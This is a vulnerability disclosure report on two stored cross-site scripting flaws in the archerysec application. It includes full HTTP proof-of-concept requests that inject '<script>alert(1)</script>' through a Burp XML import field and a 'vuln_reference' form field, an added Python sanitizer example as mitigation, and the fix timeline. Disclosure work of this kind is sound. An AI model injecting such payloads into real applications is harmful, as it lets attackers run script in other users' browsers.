Cross-site Scripting (XSS) - Stored in archerysec/archerysec

Valid

Reported on

Oct 20th 2021


Description

The application is vulnerable to a Stored XSS attack.

It is possible for an authenticated user to inject a JavaScript payload that will be executed in the web browsers of the users viewing the affected pages.

When uploading a Burp scan, the XML field "issueBackground" of a vulnerability is not sanitized before being stored in the database. It is later rendered unchanged as the "description" of the vulnerability.

Proof of Concept

POST /report-upload/upload/ HTTP/1.1
Host: 0.0.0.0:8000
Content-Length: 8194
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://0.0.0.0:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRfZMUQMkH0VF1JMi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://0.0.0.0:8000/report-upload/upload/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csrftoken=pbh0qzX8rDZYAsCWjWTK2mg2myW7En7UL0SMxXd4ZiUpee4qAuMv7ZBQ8KS74f2e; sessionid=3cpylcnskvsbqep22w86llsa7ql9ms16
Connection: close

------WebKitFormBoundaryRfZMUQMkH0VF1JMi
Content-Disposition: form-data; name="csrfmiddlewaretoken"

td5JH8qaMzhXVqz3W2IDRjzTbGRFyNeSP2GvOwG6kecozc1xdABoWWUHXSNFYF9c
------WebKitFormBoundaryRfZMUQMkH0VF1JMi
Content-Disposition: form-data; name="project_id"

7636a614-c166-461a-a09e-cf0c07b44f91
------WebKitFormBoundaryRfZMUQMkH0VF1JMi
Content-Disposition: form-data; name="scanner"

burp_scan
------WebKitFormBoundaryRfZMUQMkH0VF1JMi
Content-Disposition: form-data; name="target"

test
------WebKitFormBoundaryRfZMUQMkH0VF1JMi
Content-Disposition: form-data; name="file"; filename="poc.xml"
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE issues [
<!ELEMENT issues (issue*)>
<!ATTLIST issues burpVersion CDATA "">
<!ATTLIST issues exportTime CDATA "">
<!ELEMENT issue (serialNumber, type, name, host, path, location, severity, confidence, issueBackground?, remediationBackground?, references?, vulnerabilityClassifications?, issueDetail?, issueDetailItems?, remediationDetail?, requestresponse*, collaboratorEvent*, infiltratorEvent*, staticAnalysis*, dynamicAnalysis*)>
<!ELEMENT serialNumber (#PCDATA)>
<!ELEMENT type (#PCDATA)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT path (#PCDATA)>
<!ELEMENT location (#PCDATA)>
<!ELEMENT severity (#PCDATA)>
<!ELEMENT confidence (#PCDATA)>
<!ELEMENT issueBackground (#PCDATA)>
<!ELEMENT remediationBackground (#PCDATA)>
<!ELEMENT references (#PCDATA)>
<!ELEMENT vulnerabilityClassifications (#PCDATA)>
<!ELEMENT issueDetail (#PCDATA)>
<!ELEMENT issueDetailItems (issueDetailItem*)>
<!ELEMENT issueDetailItem (#PCDATA)>
<!ELEMENT remediationDetail (#PCDATA)>
<!ELEMENT requestresponse (request?, response?, responseRedirected?)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request method CDATA "">
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT responseRedirected (#PCDATA)>
<!ELEMENT sender (#PCDATA)>
<!ELEMENT message (#PCDATA)>
<!ELEMENT conversation (#PCDATA)>
<!ELEMENT recipient (#PCDATA)>
<!ELEMENT recipients (recipient*)>
<!ELEMENT smtp (sender, recipients, message, conversation)>
<!ELEMENT collaboratorEvent (interactionType, originIp, time, lookupType?, lookupHost?, requestresponse?, smtp?)>
<!ELEMENT interactionType (#PCDATA)>
<!ELEMENT originIp (#PCDATA)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT lookupType (#PCDATA)>
<!ELEMENT lookupHost (#PCDATA)>
<!ELEMENT infiltratorEvent (parameterName, platform, signature, stackTrace?, parameterValue?, collaboratorEvent)>
<!ELEMENT parameterName (#PCDATA)>
<!ELEMENT platform (#PCDATA)>
<!ELEMENT signature (#PCDATA)>
<!ELEMENT stackTrace (#PCDATA)>
<!ELEMENT parameterValue (#PCDATA)>
<!ELEMENT dynamicAnalysis (source, sink, sourceStackTrace, sinkStackTrace, eventListenerStackTrace, sourceValue, sinkValue, eventHandlerData, eventHandlerDataType, eventHandlerManipulatedData, poc, origin, isOriginChecked, sourceElementId, sourceElementName, eventFiredEventName, eventFiredElementId, eventFiredElementName, eventFiredOuterHtml)>
<!ELEMENT staticAnalysis (source, sink, codeSnippets)>
<!ELEMENT source (#PCDATA)>
<!ELEMENT sink (#PCDATA)>
<!ELEMENT sourceStackTrace (#PCDATA)>
<!ELEMENT sinkStackTrace (#PCDATA)>
<!ELEMENT eventListenerStackTrace (#PCDATA)>
<!ELEMENT sourceValue (#PCDATA)>
<!ELEMENT sinkValue (#PCDATA)>
<!ELEMENT eventHandlerData (#PCDATA)>
<!ELEMENT eventHandlerDataType (#PCDATA)>
<!ELEMENT sourceElementId (#PCDATA)>
<!ELEMENT sourceElementName (#PCDATA)>
<!ELEMENT eventFiredEventName (#PCDATA)>
<!ELEMENT eventFiredElementId (#PCDATA)>
<!ELEMENT eventFiredElementName (#PCDATA)>
<!ELEMENT eventFiredOuterHtml (#PCDATA)>
<!ELEMENT eventHandlerManipulatedData (#PCDATA)>
<!ELEMENT poc (#PCDATA)>
<!ELEMENT origin (#PCDATA)>
<!ELEMENT isOriginChecked (#PCDATA)>
<!ELEMENT codeSnippets (codeSnippet*)>
<!ELEMENT codeSnippet (#PCDATA)>
]>
<issues burpVersion="2021.8.4" exportTime="Wed Oct 20 14:17:19 CEST 2021">
  <issue>
    <serialNumber>859448131531424768</serialNumber>
    <type>5245344</type>
    <name><![CDATA[aaaaa]]></name>
    <host ip="93.32.21.34">http://example.com</host>
    <path><![CDATA[/]]></path>
    <location><![CDATA[/]]></location>
    <severity>Information</severity>
    <confidence>Firm</confidence>
    <issueBackground><![CDATA[<p>aaa<script>alert(1)</script> </p>]]></issueBackground>
    <remediationBackground><![CDATA[<p>aaa</p>]]></remediationBackground>
    <references><![CDATA[<ul>
    <li><a href="https://portswigger.net/web-security/clickjacking">Web Security Academy: Clickjacking</a></li>
    <li><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options">X-Frame-Options</a></li>
</ul>]]></references>
    <vulnerabilityClassifications><![CDATA[<ul>
<li><a href="https://cwe.mitre.org/data/definitions/693.html">CWE-693: Protection Mechanism Failure</a></li>
    <li><a href="https://capec.mitre.org/data/definitions/103.html">CAPEC-103: Clickjacking</a></li>
</ul>]]></vulnerabilityClassifications>
    <requestresponse>
      <request method="GET" base64="true"><![CDATA[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]]></request>
      <response base64="true"><![CDATA[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]]></response>
      <responseRedirected>false</responseRedirected>
    </requestresponse>
  </issue>
</issues>

------WebKitFormBoundaryRfZMUQMkH0VF1JMi--

Impact

An attacker is able to execute JavaScript in the browser of any user viewing the affected vulnerability.

Occurrences

Description

The application is vulnerable to a Stored XSS attack.

It is possible for an authenticated user to inject a JavaScript payload that will be executed in the web browsers of the users viewing the affected pages.

When adding a vulnerability in Pentest Activity > Pentest List > Add vulnerability, the field "vuln_reference" of a vulnerability is not sanitized before being stored in the database. It is later rendered unchanged as the "reference" of the vulnerability.
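Both occurrences share one root cause: HTML supplied by a scanner import (the Burp "issueBackground" and "references" fields) or by a form field ("vuln_reference") is stored and rendered as-is. The following is an added example, not ArcherySec's own code, of the mitigation a reviewer would expect: an allowlist sanitizer applied before storage, so that the legitimate markup Burp emits (`<p>`, `<ul>`, `<li>`, `<a href>`) survives while `<script>` bodies, event-handler attributes and non-http(s) links are dropped. `import_burp_issues` and the constructed `SAMPLE_BURP_XML` (which mirrors the PoC's issueBackground, without the DTD) are hypothetical.

```python
# Added example (not ArcherySec's code): allowlist-sanitize scanner-supplied HTML
# before storing it, instead of escaping everything and breaking Burp's markup.
from html import escape
from html.parser import HTMLParser
import xml.etree.ElementTree as ET

ALLOWED_TAGS = {"p", "ul", "li", "a", "b", "i", "code", "br"}
ALLOWED_ATTRS = {"a": {"href"}}          # href only, and only http(s) URLs
DROP_CONTENT = {"script", "style"}       # tag *and* body are discarded

class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0      # skip > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
        elif not self.skip and tag in ALLOWED_TAGS:
            kept = [f' {k}="{escape(v, quote=True)}"' for k, v in attrs
                    if k in ALLOWED_ATTRS.get(tag, ()) and v
                    and v.strip().lower().startswith(("http://", "https://"))]
            self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))   # text nodes are always re-escaped

def sanitize_html(fragment):
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()                            # flush buffered trailing text
    return "".join(p.out)

# Constructed Burp export mirroring the report's PoC (DTD omitted).
SAMPLE_BURP_XML = """<issues burpVersion="2021.8.4"><issue>
<name><![CDATA[aaaaa]]></name>
<issueBackground><![CDATA[<p>aaa<script>alert(1)</script> </p>]]></issueBackground>
<references><![CDATA[<ul><li><a href="https://portswigger.net/web-security/clickjacking">Clickjacking</a></li></ul>]]></references>
</issue></issues>"""

def import_burp_issues(xml_text):
    """Hypothetical import step: sanitize HTML fields before they are stored."""
    return [{"name": escape(i.findtext("name", "")),
             "description": sanitize_html(i.findtext("issueBackground", "")),
             "reference": sanitize_html(i.findtext("references", ""))}
            for i in ET.fromstring(xml_text).iter("issue")]
```

The same `sanitize_html` call belongs on the "vuln_reference" form field at submission time; in a Django view the stored value would then be safe to render even where a template marks it as trusted HTML.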

Proof of Concept

POST /pentest/add_vuln/ HTTP/1.1
Host: 0.0.0.0:8000
Content-Length: 1471
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://0.0.0.0:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMGFjqlpqq5ANGLQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://0.0.0.0:8000/pentest/add_new_vuln/?scan_id=2cf9d567-b883-4c69-ac1c-235591c329da&vuln_id=29fcf20a-af79-40d7-9b6f-425666060e9c&project_id=7636a614-c166-461a-a09e-cf0c07b44f91
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csrftoken=pbh0qzX8rDZYAsCWjWTK2mg2myW7En7UL0SMxXd4ZiUpee4qAuMv7ZBQ8KS74f2e; sessionid=3cpylcnskvsbqep22w86llsa7ql9ms16
Connection: close

------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="csrfmiddlewaretoken"

LkgYD7QlBBYSeb3hlkqGR3a8fHOE6xNB79RKKv6h9gTjSXvLCSjrWGvW1TKEwpIV
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="scan_id"

2cf9d567-b883-4c69-ac1c-235591c329da
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="project_id"

7636a614-c166-461a-a09e-cf0c07b44f91
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="vuln_name"

aaa
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="vuln_severity"

High
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="pentest_type"

web
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="vuln_instance"


------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="vuln_description"

aaa
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="vuln_solution"

aaa
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="vuln_reference"

payload: <script>alert(1)</script>
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="poc_description"


------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="poc"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryAMGFjqlpqq5ANGLQ--

Impact

An attacker is able to execute JavaScript in the browser of any user viewing the affected vulnerability.

References

We created a GitHub Issue asking the maintainers to create a SECURITY.md (a month ago)
Guillaume GRABÉ modified their report (a month ago)
We have contacted a member of the archerysec team and are waiting to hear back (a month ago)
We have sent a follow up to the archerysec team. We will try again in 7 days. (a month ago)
We have sent a second follow up to the archerysec team. We will try again in 10 days. (a month ago)
Anand Tiwari validated this vulnerability (a month ago)
Guillaume GRABÉ has been awarded the disclosure bounty
The fix bounty is now up for grabs

Anand Tiwari (Maintainer), a month ago:

Thanks for reporting to us. We'll apply a fix soon.

Anand Tiwari confirmed that a fix has been merged on 793e94 (9 days ago)
Anand Tiwari has been awarded the fix bounty
manual_vuln_data.html#L79 has been validated